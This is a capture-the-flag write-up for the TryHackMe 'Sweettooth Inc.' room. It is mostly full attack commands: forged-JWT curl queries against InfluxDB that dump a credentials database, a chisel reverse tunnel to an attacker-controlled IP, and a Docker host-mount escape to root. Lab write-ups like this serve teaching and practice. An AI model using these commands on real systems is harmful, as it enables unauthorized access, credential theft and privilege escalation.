Sweettooth Inc.

https://tryhackme.com/room/sweettoothinc

User Flag

Let's start with an nmap scan

Googling about InfluxDB we found something interesting in the following blog:

When all else fails - find a 0-dayKomodoSec

If we go to the /debug/requests path we can find an username for the database

Now we have to generate a JWT token (https://jwt.io/). The exp field is the token expiration date in epoch format.

Let's see if the token works:

curl -G http://10.10.62.99:8086/query  --header "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im81eVk2eXlhIiwiZXhwIjoxNjU4MzIxNTUyfQ.Sg5u_GBZSETHNCGncgRdsW2GQk7bGTPIXRuFOh2mV7A" --data-urlencode "q=SHOW DATABASES"

It works.

No we have to extract the data we are asked

#List the tables on the tanks database
curl -G http://10.10.166.174:8086/query  --header "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im81eVk2eXlhIiwiZXhwIjoxNjU4MzIxNTUyfQ.Sg5u_GBZSETHNCGncgRdsW2GQk7bGTPIXRuFOh2mV7A" --data-urlencode "db=tanks" --data-urlencode "q=SHOW MEASUREMENTS"

#Get data from the water_tank table
curl -G http://10.10.166.174:8086/query  --header "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im81eVk2eXlhIiwiZXhwIjoxNjU4MzIxNTUyfQ.Sg5u_GBZSETHNCGncgRdsW2GQk7bGTPIXRuFOh2mV7A" --data-urlencode "db=tanks" --data-urlencode "q=SELECT * FROM water_tank"

#List the tables on the mixer database
curl -G http://10.10.166.174:8086/query  --header "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im81eVk2eXlhIiwiZXhwIjoxNjU4MzIxNTUyfQ.Sg5u_GBZSETHNCGncgRdsW2GQk7bGTPIXRuFOh2mV7A" --data-urlencode "db=mixer" --data-urlencode "q=SHOW MEASUREMENTS"

#Get data from the mixer_stats table
curl -G http://10.10.166.174:8086/query  --header "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im81eVk2eXlhIiwiZXhwIjoxNjU4MzIxNTUyfQ.Sg5u_GBZSETHNCGncgRdsW2GQk7bGTPIXRuFOh2mV7A" --data-urlencode "db=mixer" --data-urlencode "q=SELECT * FROM mixer_stats"

#To get the max RPM we use this query
curl -G http://10.10.166.174:8086/query  --header "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im81eVk2eXlhIiwiZXhwIjoxNjU4MzIxNTUyfQ.Sg5u_GBZSETHNCGncgRdsW2GQk7bGTPIXRuFOh2mV7A" --data-urlencode "db=mixer" --data-urlencode "q=SELECT max(motor_rpm) FROM mixer_stats"

#List the tables on the creds database
curl -G http://10.10.166.174:8086/query  --header "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im81eVk2eXlhIiwiZXhwIjoxNjU4MzIxNTUyfQ.Sg5u_GBZSETHNCGncgRdsW2GQk7bGTPIXRuFOh2mV7A" --data-urlencode "db=creds" --data-urlencode "q=SHOW MEASUREMENTS"

#Get data from the ssh table
curl -G http://10.10.166.174:8086/query  --header "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Im81eVk2eXlhIiwiZXhwIjoxNjU4MzIxNTUyfQ.Sg5u_GBZSETHNCGncgRdsW2GQk7bGTPIXRuFOh2mV7A" --data-urlencode "db=creds" --data-urlencode "q=SELECT * from ssh"

Let's ssh into the machine using the creds we found and grab the flag.

Root Flag

Looking around the machine we found a script named "initializeandquery.sh" in the / folder. If we cat the file we see this output:

We can do a port forward and access that 8080 port from our machine.

Let's upload chisel in the victim machine.

Let's set up a chisel listener in our machine:

sudo chisel server --reverse --port 9001

In the victim machine:

./chisel client 10.11.36.103:9001 R:8003:127.0.0.1:8080

Now we can list the docker images

DOCKER_HOST=tcp://IP:8003 docker image ls

We can escape the docker

DOCKER_HOST=tcp://IP:8003 docker run -it -v /:/mnt --rm -it influxdb:1.3.0 chroot /mnt sh

Let's upgrade the shell and grab the flag

Root Flag (Docker)

For the docker root flag we listed the containers

And then executed the following command to get the root flag from the docker container

docker container exec -it sweettoothinc cat /root/root.txt